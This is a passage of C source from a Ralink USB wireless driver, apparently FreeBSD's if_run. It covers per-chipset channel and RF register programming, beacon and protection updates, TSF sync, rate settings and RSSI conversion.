&rf); rf = (rf & ~0x0f) | rt3070_freqs[i].r; rf |= (chan <= 14) ? 0x08 : 0x04; run_rt3070_rf_write(sc, 6, rf); /* set PLL mode */ run_rt3070_rf_read(sc, 5, &rf); rf &= ~(0x08 | 0x04); rf |= (chan <= 14) ? 0x04 : 0x08; run_rt3070_rf_write(sc, 5, rf); /* set Tx power for chain 0 */ if (chan <= 14) rf = 0x60 | txpow1; else rf = 0xe0 | (txpow1 & 0xc) << 1 | (txpow1 & 0x3); run_rt3070_rf_write(sc, 12, rf); /* set Tx power for chain 1 */ if (chan <= 14) rf = 0x60 | txpow2; else rf = 0xe0 | (txpow2 & 0xc) << 1 | (txpow2 & 0x3); run_rt3070_rf_write(sc, 13, rf); /* set Tx/Rx streams */ run_rt3070_rf_read(sc, 1, &rf); rf &= ~0xfc; if (sc->ntxchains == 1) rf |= 1 << 7 | 1 << 5; /* 1T: disable Tx chains 2 & 3 */ else if (sc->ntxchains == 2) rf |= 1 << 7; /* 2T: disable Tx chain 3 */ if (sc->nrxchains == 1) rf |= 1 << 6 | 1 << 4; /* 1R: disable Rx chains 2 & 3 */ else if (sc->nrxchains == 2) rf |= 1 << 6; /* 2R: disable Rx chain 3 */ run_rt3070_rf_write(sc, 1, rf); /* set RF offset */ run_rt3070_rf_read(sc, 23, &rf); rf = (rf & ~0x7f) | sc->freq; run_rt3070_rf_write(sc, 23, rf); /* program RF filter */ rf = sc->rf24_20mhz; run_rt3070_rf_write(sc, 24, rf); /* Tx */ run_rt3070_rf_write(sc, 31, rf); /* Rx */ /* enable RF tuning */ run_rt3070_rf_read(sc, 7, &rf); rf = (chan <= 14) ? 0xd8 : ((rf & ~0xc8) | 0x14); run_rt3070_rf_write(sc, 7, rf); /* TSSI */ rf = (chan <= 14) ? 0xc3 : 0xc0; run_rt3070_rf_write(sc, 9, rf); /* set loop filter 1 */ run_rt3070_rf_write(sc, 10, 0xf1); /* set loop filter 2 */ run_rt3070_rf_write(sc, 11, (chan <= 14) ? 0xb9 : 0x00); /* set tx_mx2_ic */ run_rt3070_rf_write(sc, 15, (chan <= 14) ? 0x53 : 0x43); /* set tx_mx1_ic */ if (chan <= 14) rf = 0x48 | sc->txmixgain_2ghz; else rf = 0x78 | sc->txmixgain_5ghz; run_rt3070_rf_write(sc, 16, rf); /* set tx_lo1 */ run_rt3070_rf_write(sc, 17, 0x23); /* set tx_lo2 */ if (chan <= 14) rf = 0x93; else if (chan <= 64) rf = 0xb7; else if (chan <= 128) rf = 0x74; else rf = 0x72; run_rt3070_rf_write(sc, 19, rf); /* set rx_lo1 */ if (chan <= 14) rf = 0xb3; else if (chan <= 64) rf = 0xf6; else if (chan <= 128) rf = 0xf4; else rf = 0xf3; run_rt3070_rf_write(sc, 20, rf); /* set pfd_delay */ if (chan <= 14) rf = 0x15; else if (chan <= 64) rf = 0x3d; else rf = 0x01; run_rt3070_rf_write(sc, 25, rf); /* set rx_lo2 */ run_rt3070_rf_write(sc, 26, (chan <= 14) ? 0x85 : 0x87); /* set ldo_rf_vc */ run_rt3070_rf_write(sc, 27, (chan <= 14) ? 0x00 : 0x01); /* set drv_cc */ run_rt3070_rf_write(sc, 29, (chan <= 14) ? 0x9b : 0x9f); run_read(sc, RT2860_GPIO_CTRL, &tmp); tmp &= ~0x8080; if (chan <= 14) tmp |= 0x80; run_write(sc, RT2860_GPIO_CTRL, tmp); /* enable RF tuning */ run_rt3070_rf_read(sc, 7, &rf); run_rt3070_rf_write(sc, 7, rf | 0x01); run_delay(sc, 2); } static void run_rt3593_set_chan(struct run_softc *sc, u_int chan) { int8_t txpow1, txpow2, txpow3; uint8_t h20mhz, rf; int i; /* find the settings for this channel (we know it exists) */ for (i = 0; rt2860_rf2850[i].chan != chan; i++); /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; txpow3 = (sc->ntxchains == 3) ? sc->txpow3[i] : 0; if (chan <= 14) { run_bbp_write(sc, 25, sc->bbp25); run_bbp_write(sc, 26, sc->bbp26); } else { /* Enable IQ phase correction. */ run_bbp_write(sc, 25, 0x09); run_bbp_write(sc, 26, 0xff); } run_rt3070_rf_write(sc, 8, rt3070_freqs[i].n); run_rt3070_rf_write(sc, 9, rt3070_freqs[i].k & 0x0f); run_rt3070_rf_read(sc, 11, &rf); rf = (rf & ~0x03) | (rt3070_freqs[i].r & 0x03); run_rt3070_rf_write(sc, 11, rf); /* Set pll_idoh. 
*/ run_rt3070_rf_read(sc, 11, &rf); rf &= ~0x4c; rf |= (chan <= 14) ? 0x44 : 0x48; run_rt3070_rf_write(sc, 11, rf); if (chan <= 14) rf = txpow1 & 0x1f; else rf = 0x40 | ((txpow1 & 0x18) << 1) | (txpow1 & 0x07); run_rt3070_rf_write(sc, 53, rf); if (chan <= 14) rf = txpow2 & 0x1f; else rf = 0x40 | ((txpow2 & 0x18) << 1) | (txpow2 & 0x07); run_rt3070_rf_write(sc, 55, rf); if (chan <= 14) rf = txpow3 & 0x1f; else rf = 0x40 | ((txpow3 & 0x18) << 1) | (txpow3 & 0x07); run_rt3070_rf_write(sc, 54, rf); rf = RT3070_RF_BLOCK | RT3070_PLL_PD; if (sc->ntxchains == 3) rf |= RT3070_TX0_PD | RT3070_TX1_PD | RT3070_TX2_PD; else rf |= RT3070_TX0_PD | RT3070_TX1_PD; rf |= RT3070_RX0_PD | RT3070_RX1_PD | RT3070_RX2_PD; run_rt3070_rf_write(sc, 1, rf); run_adjust_freq_offset(sc); run_rt3070_rf_write(sc, 31, (chan <= 14) ? 0xa0 : 0x80); h20mhz = (sc->rf24_20mhz & 0x20) >> 5; run_rt3070_rf_read(sc, 30, &rf); rf = (rf & ~0x06) | (h20mhz << 1) | (h20mhz << 2); run_rt3070_rf_write(sc, 30, rf); run_rt3070_rf_read(sc, 36, &rf); if (chan <= 14) rf |= 0x80; else rf &= ~0x80; run_rt3070_rf_write(sc, 36, rf); /* Set vcolo_bs. */ run_rt3070_rf_write(sc, 34, (chan <= 14) ? 0x3c : 0x20); /* Set pfd_delay. */ run_rt3070_rf_write(sc, 12, (chan <= 14) ? 0x1a : 0x12); /* Set vco bias current control. */ run_rt3070_rf_read(sc, 6, &rf); rf &= ~0xc0; if (chan <= 14) rf |= 0x40; else if (chan <= 128) rf |= 0x80; else rf |= 0x40; run_rt3070_rf_write(sc, 6, rf); run_rt3070_rf_read(sc, 30, &rf); rf = (rf & ~0x18) | 0x10; run_rt3070_rf_write(sc, 30, rf); run_rt3070_rf_write(sc, 10, (chan <= 14) ? 0xd3 : 0xd8); run_rt3070_rf_write(sc, 13, (chan <= 14) ? 0x12 : 0x23); run_rt3070_rf_read(sc, 51, &rf); rf = (rf & ~0x03) | 0x01; run_rt3070_rf_write(sc, 51, rf); /* Set tx_mx1_cc. */ run_rt3070_rf_read(sc, 51, &rf); rf &= ~0x1c; rf |= (chan <= 14) ? 0x14 : 0x10; run_rt3070_rf_write(sc, 51, rf); /* Set tx_mx1_ic. */ run_rt3070_rf_read(sc, 51, &rf); rf &= ~0xe0; rf |= (chan <= 14) ? 0x60 : 0x40; run_rt3070_rf_write(sc, 51, rf); /* Set tx_lo1_ic. */ run_rt3070_rf_read(sc, 49, &rf); rf &= ~0x1c; rf |= (chan <= 14) ? 0x0c : 0x08; run_rt3070_rf_write(sc, 49, rf); /* Set tx_lo1_en. */ run_rt3070_rf_read(sc, 50, &rf); run_rt3070_rf_write(sc, 50, rf & ~0x20); /* Set drv_cc. */ run_rt3070_rf_read(sc, 57, &rf); rf &= ~0xfc; rf |= (chan <= 14) ? 0x6c : 0x3c; run_rt3070_rf_write(sc, 57, rf); /* Set rx_mix1_ic, rxa_lnactr, lna_vc, lna_inbias_en and lna_en. */ run_rt3070_rf_write(sc, 44, (chan <= 14) ? 0x93 : 0x9b); /* Set drv_gnd_a, tx_vga_cc_a and tx_mx2_gain. */ run_rt3070_rf_write(sc, 52, (chan <= 14) ? 0x45 : 0x05); /* Enable VCO calibration. */ run_rt3070_rf_read(sc, 3, &rf); rf &= ~RT5390_VCOCAL; rf |= (chan <= 14) ? RT5390_VCOCAL : 0xbe; run_rt3070_rf_write(sc, 3, rf); if (chan <= 14) rf = 0x23; else if (chan <= 64) rf = 0x36; else if (chan <= 128) rf = 0x32; else rf = 0x30; run_rt3070_rf_write(sc, 39, rf); if (chan <= 14) rf = 0xbb; else if (chan <= 64) rf = 0xeb; else if (chan <= 128) rf = 0xb3; else rf = 0x9b; run_rt3070_rf_write(sc, 45, rf); /* Set FEQ/AEQ control. 
*/ run_bbp_write(sc, 105, 0x34); } static void run_rt5390_set_chan(struct run_softc *sc, u_int chan) { int8_t txpow1, txpow2; uint8_t rf; int i; /* find the settings for this channel (we know it exists) */ for (i = 0; rt2860_rf2850[i].chan != chan; i++); /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; run_rt3070_rf_write(sc, 8, rt3070_freqs[i].n); run_rt3070_rf_write(sc, 9, rt3070_freqs[i].k & 0x0f); run_rt3070_rf_read(sc, 11, &rf); rf = (rf & ~0x03) | (rt3070_freqs[i].r & 0x03); run_rt3070_rf_write(sc, 11, rf); run_rt3070_rf_read(sc, 49, &rf); rf = (rf & ~0x3f) | (txpow1 & 0x3f); /* The valid range of the RF R49 is 0x00 to 0x27. */ if ((rf & 0x3f) > 0x27) rf = (rf & ~0x3f) | 0x27; run_rt3070_rf_write(sc, 49, rf); if (sc->mac_ver == 0x5392) { run_rt3070_rf_read(sc, 50, &rf); rf = (rf & ~0x3f) | (txpow2 & 0x3f); /* The valid range of the RF R50 is 0x00 to 0x27. */ if ((rf & 0x3f) > 0x27) rf = (rf & ~0x3f) | 0x27; run_rt3070_rf_write(sc, 50, rf); } run_rt3070_rf_read(sc, 1, &rf); rf |= RT3070_RF_BLOCK | RT3070_PLL_PD | RT3070_RX0_PD | RT3070_TX0_PD; if (sc->mac_ver == 0x5392) rf |= RT3070_RX1_PD | RT3070_TX1_PD; run_rt3070_rf_write(sc, 1, rf); if (sc->mac_ver != 0x5392) { run_rt3070_rf_read(sc, 2, &rf); rf |= 0x80; run_rt3070_rf_write(sc, 2, rf); run_delay(sc, 10); rf &= 0x7f; run_rt3070_rf_write(sc, 2, rf); } run_adjust_freq_offset(sc); if (sc->mac_ver == 0x5392) { /* Fix for RT5392C. */ if (sc->mac_rev >= 0x0223) { if (chan <= 4) rf = 0x0f; else if (chan >= 5 && chan <= 7) rf = 0x0e; else rf = 0x0d; run_rt3070_rf_write(sc, 23, rf); if (chan <= 4) rf = 0x0c; else if (chan == 5) rf = 0x0b; else if (chan >= 6 && chan <= 7) rf = 0x0a; else if (chan >= 8 && chan <= 10) rf = 0x09; else rf = 0x08; run_rt3070_rf_write(sc, 59, rf); } else { if (chan <= 11) rf = 0x0f; else rf = 0x0b; run_rt3070_rf_write(sc, 59, rf); } } else { /* Fix for RT5390F. */ if (sc->mac_rev >= 0x0502) { if (chan <= 11) rf = 0x43; else rf = 0x23; run_rt3070_rf_write(sc, 55, rf); if (chan <= 11) rf = 0x0f; else if (chan == 12) rf = 0x0d; else rf = 0x0b; run_rt3070_rf_write(sc, 59, rf); } else { run_rt3070_rf_write(sc, 55, 0x44); run_rt3070_rf_write(sc, 59, 0x8f); } } /* Enable VCO calibration. */ run_rt3070_rf_read(sc, 3, &rf); rf |= RT5390_VCOCAL; run_rt3070_rf_write(sc, 3, rf); } static void run_rt5592_set_chan(struct run_softc *sc, u_int chan) { const struct rt5592_freqs *freqs; uint32_t tmp; uint8_t reg, rf, txpow_bound; int8_t txpow1, txpow2; int i; run_read(sc, RT5592_DEBUG_INDEX, &tmp); freqs = (tmp & RT5592_SEL_XTAL) ? rt5592_freqs_40mhz : rt5592_freqs_20mhz; /* find the settings for this channel (we know it exists) */ for (i = 0; rt2860_rf2850[i].chan != chan; i++, freqs++); /* use Tx power values from EEPROM */ txpow1 = sc->txpow1[i]; txpow2 = sc->txpow2[i]; run_read(sc, RT3070_LDO_CFG0, &tmp); tmp &= ~0x1c000000; if (chan > 14) tmp |= 0x14000000; run_write(sc, RT3070_LDO_CFG0, tmp); /* N setting. */ run_rt3070_rf_write(sc, 8, freqs->n & 0xff); run_rt3070_rf_read(sc, 9, &rf); rf &= ~(1 << 4); rf |= ((freqs->n & 0x0100) >> 8) << 4; run_rt3070_rf_write(sc, 9, rf); /* K setting. */ run_rt3070_rf_read(sc, 9, &rf); rf &= ~0x0f; rf |= (freqs->k & 0x0f); run_rt3070_rf_write(sc, 9, rf); /* Mode setting. */ run_rt3070_rf_read(sc, 11, &rf); rf &= ~0x0c; rf |= ((freqs->m - 0x8) & 0x3) << 2; run_rt3070_rf_write(sc, 11, rf); run_rt3070_rf_read(sc, 9, &rf); rf &= ~(1 << 7); rf |= (((freqs->m - 0x8) & 0x4) >> 2) << 7; run_rt3070_rf_write(sc, 9, rf); /* R setting. 
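* (freqs->r - 1 goes into the low two bits of RF register 11; the value comes from the crystal-dependent rt5592_freqs table selected at the top of this function.)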
*/ run_rt3070_rf_read(sc, 11, &rf); rf &= ~0x03; rf |= (freqs->r - 0x1); run_rt3070_rf_write(sc, 11, rf); if (chan <= 14) { /* Initialize RF registers for 2GHZ. */ for (i = 0; i < nitems(rt5592_2ghz_def_rf); i++) { run_rt3070_rf_write(sc, rt5592_2ghz_def_rf[i].reg, rt5592_2ghz_def_rf[i].val); } rf = (chan <= 10) ? 0x07 : 0x06; run_rt3070_rf_write(sc, 23, rf); run_rt3070_rf_write(sc, 59, rf); run_rt3070_rf_write(sc, 55, 0x43); /* * RF R49/R50 Tx power ALC code. * G-band bit<7:6>=1:0, bit<5:0> range from 0x0 ~ 0x27. */ reg = 2; txpow_bound = 0x27; } else { /* Initialize RF registers for 5GHZ. */ for (i = 0; i < nitems(rt5592_5ghz_def_rf); i++) { run_rt3070_rf_write(sc, rt5592_5ghz_def_rf[i].reg, rt5592_5ghz_def_rf[i].val); } for (i = 0; i < nitems(rt5592_chan_5ghz); i++) { if (chan >= rt5592_chan_5ghz[i].firstchan && chan <= rt5592_chan_5ghz[i].lastchan) { run_rt3070_rf_write(sc, rt5592_chan_5ghz[i].reg, rt5592_chan_5ghz[i].val); } } /* * RF R49/R50 Tx power ALC code. * A-band bit<7:6>=1:1, bit<5:0> range from 0x0 ~ 0x2b. */ reg = 3; txpow_bound = 0x2b; } /* RF R49 ch0 Tx power ALC code. */ run_rt3070_rf_read(sc, 49, &rf); rf &= ~0xc0; rf |= (reg << 6); rf = (rf & ~0x3f) | (txpow1 & 0x3f); if ((rf & 0x3f) > txpow_bound) rf = (rf & ~0x3f) | txpow_bound; run_rt3070_rf_write(sc, 49, rf); /* RF R50 ch1 Tx power ALC code. */ run_rt3070_rf_read(sc, 50, &rf); rf &= ~(1 << 7 | 1 << 6); rf |= (reg << 6); rf = (rf & ~0x3f) | (txpow2 & 0x3f); if ((rf & 0x3f) > txpow_bound) rf = (rf & ~0x3f) | txpow_bound; run_rt3070_rf_write(sc, 50, rf); /* Enable RF_BLOCK, PLL_PD, RX0_PD, and TX0_PD. */ run_rt3070_rf_read(sc, 1, &rf); rf |= (RT3070_RF_BLOCK | RT3070_PLL_PD | RT3070_RX0_PD | RT3070_TX0_PD); if (sc->ntxchains > 1) rf |= RT3070_TX1_PD; if (sc->nrxchains > 1) rf |= RT3070_RX1_PD; run_rt3070_rf_write(sc, 1, rf); run_rt3070_rf_write(sc, 6, 0xe4); run_rt3070_rf_write(sc, 30, 0x10); run_rt3070_rf_write(sc, 31, 0x80); run_rt3070_rf_write(sc, 32, 0x80); run_adjust_freq_offset(sc); /* Enable VCO calibration. */ run_rt3070_rf_read(sc, 3, &rf); rf |= RT5390_VCOCAL; run_rt3070_rf_write(sc, 3, rf); } static void run_set_rx_antenna(struct run_softc *sc, int aux) { uint32_t tmp; uint8_t bbp152; if (aux) { if (sc->rf_rev == RT5390_RF_5370) { run_bbp_read(sc, 152, &bbp152); run_bbp_write(sc, 152, bbp152 & ~0x80); } else { run_mcu_cmd(sc, RT2860_MCU_CMD_ANTSEL, 0); run_read(sc, RT2860_GPIO_CTRL, &tmp); run_write(sc, RT2860_GPIO_CTRL, (tmp & ~0x0808) | 0x08); } } else { if (sc->rf_rev == RT5390_RF_5370) { run_bbp_read(sc, 152, &bbp152); run_bbp_write(sc, 152, bbp152 | 0x80); } else { run_mcu_cmd(sc, RT2860_MCU_CMD_ANTSEL, 1); run_read(sc, RT2860_GPIO_CTRL, &tmp); run_write(sc, RT2860_GPIO_CTRL, tmp & ~0x0808); } } } static int run_set_chan(struct run_softc *sc, struct ieee80211_channel *c) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; u_int chan, group; chan = ieee80211_chan2ieee(ic, c); if (chan == 0 || chan == IEEE80211_CHAN_ANY) return (EINVAL); if (sc->mac_ver == 0x5592) run_rt5592_set_chan(sc, chan); else if (sc->mac_ver >= 0x5390) run_rt5390_set_chan(sc, chan); else if (sc->mac_ver == 0x3593) run_rt3593_set_chan(sc, chan); else if (sc->mac_ver == 0x3572) run_rt3572_set_chan(sc, chan); else if (sc->mac_ver >= 0x3070) run_rt3070_set_chan(sc, chan); else run_rt2870_set_chan(sc, chan); /* determine channel group */ if (chan <= 14) group = 0; else if (chan <= 64) group = 1; else if (chan <= 128) group = 2; else group = 3; /* XXX necessary only when group has changed! 
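* run_select_chan_group() reprograms the settings that depend on the channel group computed above (0: 2GHz, 1: channels 36-64, 2: channels 100-128, 3: above 128), so it only strictly needs to run when that group changes.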
*/ run_select_chan_group(sc, group); run_delay(sc, 10); /* Perform IQ calibration. */ if (sc->mac_ver >= 0x5392) run_iq_calib(sc, chan); return (0); } static void run_set_channel(struct ieee80211com *ic) { struct run_softc *sc = ic->ic_ifp->if_softc; RUN_LOCK(sc); run_set_chan(sc, ic->ic_curchan); RUN_UNLOCK(sc); return; } static void run_scan_start(struct ieee80211com *ic) { struct run_softc *sc = ic->ic_ifp->if_softc; uint32_t tmp; RUN_LOCK(sc); /* abort TSF synchronization */ run_read(sc, RT2860_BCN_TIME_CFG, &tmp); run_write(sc, RT2860_BCN_TIME_CFG, tmp & ~(RT2860_BCN_TX_EN | RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN)); run_set_bssid(sc, sc->sc_ifp->if_broadcastaddr); RUN_UNLOCK(sc); return; } static void run_scan_end(struct ieee80211com *ic) { struct run_softc *sc = ic->ic_ifp->if_softc; RUN_LOCK(sc); run_enable_tsf_sync(sc); /* XXX keep local copy */ run_set_bssid(sc, sc->sc_bssid); RUN_UNLOCK(sc); return; } /* * Could be called from ieee80211_node_timeout() * (non-sleepable thread) */ static void run_update_beacon(struct ieee80211vap *vap, int item) { struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; struct run_vap *rvp = RUN_VAP(vap); int mcast = 0; uint32_t i; KASSERT(vap != NULL, ("no beacon")); switch (item) { case IEEE80211_BEACON_ERP: run_updateslot(ic->ic_ifp); break; case IEEE80211_BEACON_HTINFO: run_updateprot(ic); break; case IEEE80211_BEACON_TIM: mcast = 1; /* TODO */ break; default: break; } setbit(rvp->bo.bo_flags, item); ieee80211_beacon_update(vap->iv_bss, &rvp->bo, rvp->beacon_mbuf, mcast); i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_update_beacon_cb; sc->cmdq[i].arg0 = vap; ieee80211_runtask(ic, &sc->cmdq_task); return; } static void run_update_beacon_cb(void *arg) { struct ieee80211vap *vap = arg; struct run_vap *rvp = RUN_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct run_softc *sc = ic->ic_ifp->if_softc; struct rt2860_txwi txwi; struct mbuf *m; uint16_t txwisize; uint8_t ridx; if (vap->iv_bss->ni_chan == IEEE80211_CHAN_ANYC) return; if (ic->ic_bsschan == IEEE80211_CHAN_ANYC) return; /* * No need to call ieee80211_beacon_update(); run_update_beacon() * takes care of the appropriate calls. */ if (rvp->beacon_mbuf == NULL) { rvp->beacon_mbuf = ieee80211_beacon_alloc(vap->iv_bss, &rvp->bo); if (rvp->beacon_mbuf == NULL) return; } m = rvp->beacon_mbuf; memset(&txwi, 0, sizeof(txwi)); txwi.wcid = 0xff; txwi.len = htole16(m->m_pkthdr.len); /* send beacons at the lowest available rate */ ridx = (ic->ic_curmode == IEEE80211_MODE_11A) ? RT2860_RIDX_OFDM6 : RT2860_RIDX_CCK1; txwi.phy = htole16(rt2860_rates[ridx].mcs); if (rt2860_rates[ridx].phy == IEEE80211_T_OFDM) txwi.phy |= htole16(RT2860_PHY_OFDM); txwi.txop = RT2860_TX_TXOP_HT; txwi.flags = RT2860_TX_TS; txwi.xflags = RT2860_TX_NSEQ; txwisize = (sc->mac_ver == 0x5592) ? 
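/* the RT5592 TXWI carries one extra 32-bit word */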
sizeof(txwi) + sizeof(uint32_t) : sizeof(txwi); run_write_region_1(sc, RT2860_BCN_BASE(rvp->rvp_id), (uint8_t *)&txwi, txwisize); run_write_region_1(sc, RT2860_BCN_BASE(rvp->rvp_id) + txwisize, mtod(m, uint8_t *), (m->m_pkthdr.len + 1) & ~1); } static void run_updateprot(struct ieee80211com *ic) { struct run_softc *sc = ic->ic_ifp->if_softc; uint32_t i; i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_updateprot_cb; sc->cmdq[i].arg0 = ic; ieee80211_runtask(ic, &sc->cmdq_task); } static void run_updateprot_cb(void *arg) { struct ieee80211com *ic = arg; struct run_softc *sc = ic->ic_ifp->if_softc; uint32_t tmp; tmp = RT2860_RTSTH_EN | RT2860_PROT_NAV_SHORT | RT2860_TXOP_ALLOW_ALL; /* setup protection frame rate (MCS code) */ tmp |= (ic->ic_curmode == IEEE80211_MODE_11A) ? rt2860_rates[RT2860_RIDX_OFDM6].mcs : rt2860_rates[RT2860_RIDX_CCK11].mcs; /* CCK frames don't require protection */ run_write(sc, RT2860_CCK_PROT_CFG, tmp); if (ic->ic_flags & IEEE80211_F_USEPROT) { if (ic->ic_protmode == IEEE80211_PROT_RTSCTS) tmp |= RT2860_PROT_CTRL_RTS_CTS; else if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) tmp |= RT2860_PROT_CTRL_CTS; } run_write(sc, RT2860_OFDM_PROT_CFG, tmp); } static void run_usb_timeout_cb(void *arg) { struct ieee80211vap *vap = arg; struct run_softc *sc = vap->iv_ic->ic_ifp->if_softc; RUN_LOCK_ASSERT(sc, MA_OWNED); if(vap->iv_state == IEEE80211_S_RUN && vap->iv_opmode != IEEE80211_M_STA) run_reset_livelock(sc); else if (vap->iv_state == IEEE80211_S_SCAN) { DPRINTF("timeout caused by scan\n"); /* cancel bgscan */ ieee80211_cancel_scan(vap); } else DPRINTF("timeout by unknown cause\n"); } static void run_reset_livelock(struct run_softc *sc) { uint32_t tmp; RUN_LOCK_ASSERT(sc, MA_OWNED); /* * In IBSS or HostAP modes (when the hardware sends beacons), the MAC * can run into a livelock and start sending CTS-to-self frames like * crazy if protection is enabled. Reset MAC/BBP for a while */ run_read(sc, RT2860_DEBUG, &tmp); DPRINTFN(3, "debug reg %08x\n", tmp); if ((tmp & (1 << 29)) && (tmp & (1 << 7 | 1 << 5))) { DPRINTF("CTS-to-self livelock detected\n"); run_write(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_SRST); run_delay(sc, 1); run_write(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_RX_EN | RT2860_MAC_TX_EN); } } static void run_update_promisc_locked(struct ifnet *ifp) { struct run_softc *sc = ifp->if_softc; uint32_t tmp; run_read(sc, RT2860_RX_FILTR_CFG, &tmp); tmp |= RT2860_DROP_UC_NOME; if (ifp->if_flags & IFF_PROMISC) tmp &= ~RT2860_DROP_UC_NOME; run_write(sc, RT2860_RX_FILTR_CFG, tmp); DPRINTF("%s promiscuous mode\n", (ifp->if_flags & IFF_PROMISC) ? "entering" : "leaving"); } static void run_update_promisc(struct ifnet *ifp) { struct run_softc *sc = ifp->if_softc; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; RUN_LOCK(sc); run_update_promisc_locked(ifp); RUN_UNLOCK(sc); } static void run_enable_tsf_sync(struct run_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint32_t tmp; DPRINTF("rvp_id=%d ic_opmode=%d\n", RUN_VAP(vap)->rvp_id, ic->ic_opmode); run_read(sc, RT2860_BCN_TIME_CFG, &tmp); tmp &= ~0x1fffff; tmp |= vap->iv_bss->ni_intval * 16; tmp |= RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN; if (ic->ic_opmode == IEEE80211_M_STA) { /* * Local TSF is always updated with remote TSF on beacon * reception. 
*/ tmp |= 1 << RT2860_TSF_SYNC_MODE_SHIFT; } else if (ic->ic_opmode == IEEE80211_M_IBSS) { tmp |= RT2860_BCN_TX_EN; /* * Local TSF is updated with remote TSF on beacon reception * only if the remote TSF is greater than local TSF. */ tmp |= 2 << RT2860_TSF_SYNC_MODE_SHIFT; } else if (ic->ic_opmode == IEEE80211_M_HOSTAP || ic->ic_opmode == IEEE80211_M_MBSS) { tmp |= RT2860_BCN_TX_EN; /* SYNC with nobody */ tmp |= 3 << RT2860_TSF_SYNC_MODE_SHIFT; } else { DPRINTF("Enabling TSF failed. undefined opmode\n"); return; } run_write(sc, RT2860_BCN_TIME_CFG, tmp); } static void run_enable_mrr(struct run_softc *sc) { #define CCK(mcs) (mcs) #define OFDM(mcs) (1 << 3 | (mcs)) run_write(sc, RT2860_LG_FBK_CFG0, OFDM(6) << 28 | /* 54->48 */ OFDM(5) << 24 | /* 48->36 */ OFDM(4) << 20 | /* 36->24 */ OFDM(3) << 16 | /* 24->18 */ OFDM(2) << 12 | /* 18->12 */ OFDM(1) << 8 | /* 12-> 9 */ OFDM(0) << 4 | /* 9-> 6 */ OFDM(0)); /* 6-> 6 */ run_write(sc, RT2860_LG_FBK_CFG1, CCK(2) << 12 | /* 11->5.5 */ CCK(1) << 8 | /* 5.5-> 2 */ CCK(0) << 4 | /* 2-> 1 */ CCK(0)); /* 1-> 1 */ #undef OFDM #undef CCK } static void run_set_txpreamble(struct run_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; uint32_t tmp; run_read(sc, RT2860_AUTO_RSP_CFG, &tmp); if (ic->ic_flags & IEEE80211_F_SHPREAMBLE) tmp |= RT2860_CCK_SHORT_EN; else tmp &= ~RT2860_CCK_SHORT_EN; run_write(sc, RT2860_AUTO_RSP_CFG, tmp); } static void run_set_basicrates(struct run_softc *sc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; /* set basic rates mask */ if (ic->ic_curmode == IEEE80211_MODE_11B) run_write(sc, RT2860_LEGACY_BASIC_RATE, 0x003); else if (ic->ic_curmode == IEEE80211_MODE_11A) run_write(sc, RT2860_LEGACY_BASIC_RATE, 0x150); else /* 11g */ run_write(sc, RT2860_LEGACY_BASIC_RATE, 0x15f); } static void run_set_leds(struct run_softc *sc, uint16_t which) { (void)run_mcu_cmd(sc, RT2860_MCU_CMD_LEDS, which | (sc->leds & 0x7f)); } static void run_set_bssid(struct run_softc *sc, const uint8_t *bssid) { run_write(sc, RT2860_MAC_BSSID_DW0, bssid[0] | bssid[1] << 8 | bssid[2] << 16 | bssid[3] << 24); run_write(sc, RT2860_MAC_BSSID_DW1, bssid[4] | bssid[5] << 8); } static void run_set_macaddr(struct run_softc *sc, const uint8_t *addr) { run_write(sc, RT2860_MAC_ADDR_DW0, addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24); run_write(sc, RT2860_MAC_ADDR_DW1, addr[4] | addr[5] << 8 | 0xff << 16); } static void run_updateslot(struct ifnet *ifp) { struct run_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint32_t i; i = RUN_CMDQ_GET(&sc->cmdq_store); DPRINTF("cmdq_store=%d\n", i); sc->cmdq[i].func = run_updateslot_cb; sc->cmdq[i].arg0 = ifp; ieee80211_runtask(ic, &sc->cmdq_task); return; } /* ARGSUSED */ static void run_updateslot_cb(void *arg) { struct ifnet *ifp = arg; struct run_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; run_read(sc, RT2860_BKOFF_SLOT_CFG, &tmp); tmp &= ~0xff; tmp |= (ic->ic_flags & IEEE80211_F_SHSLOT) ? 
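/* slot time in microseconds: 9 with short slots, 20 otherwise */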
9 : 20; run_write(sc, RT2860_BKOFF_SLOT_CFG, tmp); } static void run_update_mcast(struct ifnet *ifp) { /* h/w filter supports getting everything or nothing */ ifp->if_flags |= IFF_ALLMULTI; } static int8_t run_rssi2dbm(struct run_softc *sc, uint8_t rssi, uint8_t rxchain) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211_channel *c = ic->ic_curchan; int delta; if (IEEE80211_IS_CHAN_5GHZ(c)) { u_int chan = ieee80211_chan2ieee(ic, c); delta = sc->rssi_5ghz[rxchain]; /* determine channel group */ if (chan <= 64) delta -= sc->lna[1]; else if (chan <= 128) delta -= sc->lna[2]; else delta -= sc->lna[3]; } else delta = sc->rssi_2ghz[rxchain] - sc->lna[0]; return (-12 - delta - rssi); } static void run_rt5390_bbp_init(struct run_softc *sc) { int i; uint8_t bbp; /* Apply maximum likelihood detection for 2 stream case. */ run_bbp_read(sc, 105, &bbp); if (sc->nrxchains > 1) run_bbp_write(sc, 105, bbp | RT5390_MLD); /* Avoid data lost and CRC error. */ run_bbp_read(sc, 4, &bbp); run_bbp_write(sc, 4, bbp | 